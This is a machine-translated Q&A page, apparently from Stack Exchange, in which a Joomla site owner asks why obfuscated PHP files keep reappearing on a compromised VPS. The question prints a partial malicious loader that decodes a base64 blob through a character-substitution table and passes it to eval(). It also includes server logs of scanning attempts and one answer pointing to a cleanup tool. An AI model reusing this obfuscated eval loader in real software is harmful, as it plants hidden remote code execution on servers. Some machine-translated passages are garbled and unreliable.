Question

我的服务器在某个地方有一个洞，我需要一些帮助才能插上它。包含 base64 编码代码的PHP文件会一直显示在我的Joomla网站上。

我最初被列入黑名单（kelihos被列为原因）并发现我有许多随机的PHP文件，但人性化（login.php，file.php，alias75.php .. 。），Joomla目录中的名称。在base64_decode函数之后，所有文件都有脚本的主要部分。以下是此类文件列表的示例：

-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php

注意日期＆amp;时间。圣诞节之前的夜晚。这总是一样的 - 文件出现在早上6点，日期从12月24日开始。这可能是一个线索吗？以下是实际代码的片段：

<?php
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($wynuczq);}
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'.
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'.

接下来的1900线和续以：

结尾

;
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E');
eval(jqgwuawwjs($ldo, $zmdjyoxo));?>

当您更改eval以进行打印时，这就是出现的问题（代码对于消息正文来说很大 - 这里是到pastebin的链接）：

http://pastebin.com/xcY3wQs6

我从服务器删除了所有这些文件，更改了root密码，mysql密码，joomla密码＆amp;为joomla管理员激活了双因素身份验证。

我注意到一个月前的奇怪行为，但在调查问题（可能与此相关）之前，我的提供商 - Host9 发生了灾难性的失败。这让我没有网站＆amp;邮件服务器从12月15日至12月12日（！）。从那时起，我有一个cron工作，寻找这些PHP文件。当然，删除它们只能解决问题的一半。问题是这些文件是如何不断出现的？

我有一个VPS：

x86_64上的Ubuntu Server Linux 3.13.0-63-generic

的Apache / 2.4.7

PHP 5.5.9

Joomla 3.4.8

该文件在早上6点之后显示，所以我在那个时候包含了apache2 access.log：

61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET / HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&amp;db=&amp;token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&amp;token=79eab716479466d5c44116323db94bb0&amp;nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"

Apache2 error.log

[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c'\xfdF\x9c\xd8\x02\xb9N\xfa\x8d\xc6J(\x9c\xb0\x04\xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat

Answer 1

代码看起来像恶意软件脚本，并且经过编码以保护。我建议你用程序删除它。

尝试narnia gurdian，http://github.com/Pilskalns/Narnia-Guardian

尝试使用上述资源从您的所有文件中删除这些已编码的代码段。这很容易设置，也易于使用。所有你只需要留住病人。

包含base64_decode的PHP文件显示在服务器上

1 个答案: